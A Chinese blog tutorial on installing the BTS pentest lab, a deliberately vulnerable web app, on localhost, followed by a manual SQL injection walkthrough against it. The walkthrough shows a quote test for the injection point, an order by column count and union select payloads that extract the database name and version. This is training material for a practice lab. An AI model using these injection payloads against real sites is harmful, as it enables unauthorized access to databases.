BTS渗透测试实验室----安装与实战

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/u011781521/article/details/59529986

一、简介


BTS渗透测试实验室是一个开放源码的脆弱的Web应用程序,创建的网络安全和隐私的基础(www.cysecurity.org)。它可以用来了解许多不同类型的Web应用程序漏洞。

目前,该应用程序包含以下类型的漏洞:


● SQL注入
XSS(包括Flash XSS)
CSRF
点击劫持
SSRF
文件包含
执行代码
不安全的直接对象引用
不受限制的文件上传漏洞
打开URL重定向
服务器端包含(SSI)注入


二、安装与配置


首先下载源码,这里可以下载我汉化好的中文版:http://download.csdn.net/detail/u011781521/9768345  下载下来之后,解压到集成环境中的WWW目录,我这里使用的是"PHPstudy"。




修改文件夹下的config.php配置正确的数据库连接信息




然后访问: http://localhost/btslab/setup.php




点击"Setup"进行数据库初始化,初始化之后就会进入首页




然后点击登录,输入用户名与密码,这里的用户名是admin,但是密码他是通过sh1加过密的




所以直接输password是登陆不进去的,如果嫌麻烦就直接改代码或者数据库。


三、实战


这个平台包含很多东西,具体的如下




先以手工注入来演示下"SQL注入1"




http://localhost/btslab/vulnerability/ForumPosts.php?id=1



先判断是否存在注入,在地址后面加上一个单引号




直接报错!然后猜解字段数 order by 4




正确说明字段数为4,然后猜解表名


http://localhost/btslab/vulnerability/ForumPosts.php?id=1 union select 1,2,3,4 from posts



然后猜解字段内容,把2,3,4替换成你想要猜解的字段内容名字。


http://localhost/btslab/vulnerability/ForumPosts.php?id=1 union select 1,database(),version(),4 from posts




阅读更多
换一批

没有更多推荐了,返回首页